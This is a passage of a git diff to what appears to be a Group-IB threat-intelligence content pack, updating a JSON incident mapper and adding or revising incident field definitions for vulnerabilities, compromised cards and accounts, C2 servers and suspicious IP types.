Temporal": { + "simple": "extCvss.temporal" + }, + "GIB Extended Description": { + "simple": "extDescription" + }, + "GIB Has Exploit": { + "simple": "hasExploit" + }, + "GIB Href": { + "simple": "href" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Merged Cvss": { + "simple": "mergedCvss" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Reporter": { + "simple": "reporter" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB Vulnerability Type": { + "simple": "type" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Open Proxy": { + "dontMapEventToLabels": false, "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "date", - "transformers": [] - }, - "simple": "" + "simple": "dateDetected" }, "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" + "simple": "id" }, - "GIB Inject Dump": { - "complex": { - "accessor": "", - "filters": [], - "root": "injectDump", - "transformers": [] - }, - "simple": "" + "GIB Portal Link": { + "simple": "portalLink" }, - "GIB Inject MD5": { - "complex": { - "accessor": "", - "filters": [], - "root": "injectMd5", - "transformers": [] - }, - "simple": "" + "GIB Proxy Port": { + "simple": "port" }, - "GIB Malware Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "malware", - "transformers": [] - }, - "simple": "" + "GIB Proxy Source": { + "simple": "source" + }, + "GIB Proxy Sources": { + "simple": "sources" + }, + "GIB Proxy Type": { + "simple": "type" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Scanner": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" }, "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" + "simple": "portalLink" }, "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Scanner Categories": { + "simple": "categories" + }, + "GIB Scanner Sources": { + "simple": "sources" }, "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" + "simple": "evaluation.severity" }, "GIB Source": { - "complex": { - "accessor": "", - "filters": [], - "root": "source", - "transformers": [] - }, - "simple": "" + "simple": "sourceType" }, - "GIB Threat Actor ID": { - "complex": { - "accessor": "id", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP Socks Proxy": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" }, - "GIB Threat Actor Name": { - "complex": { - "accessor": "name", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "GIB Credibility": { + "simple": "evaluation.credibility" }, - "GIB Threat Actor is APT": { - "complex": { - "accessor": "isAPT", - "filters": [], - "root": "threatActor", - "transformers": [] - }, - "simple": "" + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB Date of Detection": { + "simple": "dateDetected" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Socks Proxy Source": { + "simple": "source" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP TOR Node": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "severity": { + "simple": "systemSeverity" + } + } + }, + "GIB Suspicious IP VPN": { + "dontMapEventToLabels": false, + "internalMapping": { + "GIB Admiralty Code": { + "simple": "evaluation.admiraltyCode" + }, + "GIB Credibility": { + "simple": "evaluation.credibility" + }, + "GIB Date First Seen": { + "simple": "dateFirstSeen" + }, + "GIB Date Last Seen": { + "simple": "dateLastSeen" + }, + "GIB ID": { + "simple": "id" + }, + "GIB Portal Link": { + "simple": "portalLink" + }, + "GIB Related Indicators Data": { + "simple": "indicators" + }, + "GIB Reliability": { + "simple": "evaluation.reliability" + }, + "GIB Severity": { + "simple": "evaluation.severity" + }, + "GIB Source": { + "simple": "sourceType" + }, + "GIB VPN Names": { + "simple": "names" + }, + "GIB VPN Sources": { + "simple": "sources" }, "severity": { + "simple": "systemSeverity" + } + } + }, + "Indicator Feed": { + "dontMapEventToLabels": false, + "internalMapping": { + "Country": { "complex": { - "accessor": "", + "accessor": "[0]", "filters": [], - "root": "systemSeverity", + "root": "countries", "transformers": [] - }, - "simple": "" + } }, - "GIB Admiralty Code": { + "Target": { "complex": { - "accessor": "admiraltyCode", + "accessor": "[0]", "filters": [], - "root": "evaluation", + "root": "targetedCompany", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "name": { "complex": { - "accessor": "credibility", "filters": [], - "root": "evaluation", + "root": "title", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { + "severity": { "complex": { - "accessor": "reliability", + "accessor": "severity", "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } } } - }, - "dbot_classification_incident_type_all": { - "dontMapEventToLabels": true, - "internalMapping": {} } }, "name": "Group-IB Threat Intelligence (mapper)", "type": "mapping-incoming", "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json new file mode 100644 index 000000000000..d5f44228f276 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "cpetable", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_cpetable", + "isReadOnly": false, + "locked": false, + "name": "CPE Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "markdown", + "unmapped": false, + "unsearchable": true, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json index b80a2b346981..4bf9e87d1925 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Address.json @@ -27,5 +27,12 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Compromised Account", + "GIB Compromised Card" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json index f4d78db0a5ec..922c200950c4 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Admiralty_Code.json @@ -8,7 +8,22 @@ "GIB Data Breach", "GIB OSI Git Leak", "GIB OSI Public Leak", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibadmiraltycode", @@ -33,5 +48,32 @@ "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" -} + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Data Breach", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" + ] +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json new file mode 100644 index 000000000000..f939dd33f8b1 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json @@ -0,0 +1,80 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibaffectedsoftwaretable", + "closeForm": true, + "columns": [ + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Operator", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "operator", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Version", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "version", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibaffectedsoftwaretable", + "isReadOnly": false, + "locked": false, + "name": "GIB Affected Software Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json new file mode 100644 index 000000000000..082594ee0aa4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibbulletinfamily", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibbulletinfamily", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Bulletin Family", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json new file mode 100644 index 000000000000..c82029172a2c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcnc", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcnc", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json new file mode 100644 index 000000000000..912a21b0ef2b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json new file mode 100644 index 000000000000..09229fc1798a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncport", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncport", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC Port", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json new file mode 100644 index 000000000000..06f39dc0aa02 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json @@ -0,0 +1,38 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware CNC", + "GIB Malware", + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibcncurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcncurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CNC URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware CNC", + "GIB Malware", + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json new file mode 100644 index 000000000000..bb22ebec1ddc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json @@ -0,0 +1,119 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibcpetable", + "closeForm": true, + "columns": [ + { + "displayName": "Product", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "product", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "String", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "string", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "String23", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "string23", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Type", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "type", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 173 + }, + { + "displayName": "Vendor", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "vendor", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Version", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "version", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcpetable", + "isReadOnly": false, + "locked": false, + "name": "GIB CPE Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json new file mode 100644 index 000000000000..b6706f6700be --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibcvssscore", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcvssscore", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CVSS Score", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json new file mode 100644 index 000000000000..e5450a47ef02 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibcvssvector", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcvssvector", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB CVSS Vector", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json index 14dbd120e895..2223b0df2ce1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json @@ -26,5 +26,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json index 45ca46724eb7..b3b3613519d5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Compromised Card" + "GIB Compromised Card", + "GIB Compromised Card Group" ], "caseInsensitive": false, "cliName": "gibcardissuer", @@ -26,5 +27,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card", + "GIB Compromised Card Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json index c8ac3523f2e5..ae44fd3d1100 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Compromised Card" + "GIB Compromised Card", + "GIB Compromised Card Group" ], "caseInsensitive": true, "cliName": "gibcardnumber", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card", + "GIB Compromised Card Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json index b61b0251caf1..ee0fe46fc093 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Compromised Card" + "GIB Compromised Card", + "GIB Compromised Card Group" ], "caseInsensitive": true, "cliName": "gibcardtype", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card", + "GIB Compromised Card Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json index da2f2aa5d76e..303bc1ccf97c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json new file mode 100644 index 000000000000..e2a4638d492d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "gibcompromisedaccount", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcompromisedaccount", + "isReadOnly": false, + "locked": false, + "name": "GIB Compromised Account", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json new file mode 100644 index 000000000000..4e3f47e5777b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json @@ -0,0 +1,231 @@ +{ + "id": "incident_gibcompromisedeventsinformationtable", + "version": -1, + "modified": "2024-10-14T05:35:12.890575061-04:00", + "name": "GIB Compromised Events Information Table", + "ownerOnly": false, + "cliName": "gibcompromisedeventsinformationtable", + "type": "grid", + "closeForm": true, + "editForm": true, + "required": false, + "neverSetAsRequired": false, + "isReadOnly": false, + "useAsKpi": false, + "locked": false, + "system": false, + "content": true, + "group": 0, + "hidden": false, + "openEnded": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "associatedToAll": false, + "unmapped": false, + "unsearchable": false, + "caseInsensitive": true, + "columns": [ + { + "key": "cnc", + "displayName": "cnc", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "asn", + "displayName": "asn", + "type": "shortText", + "orgType": "shortText", + "required": false, + 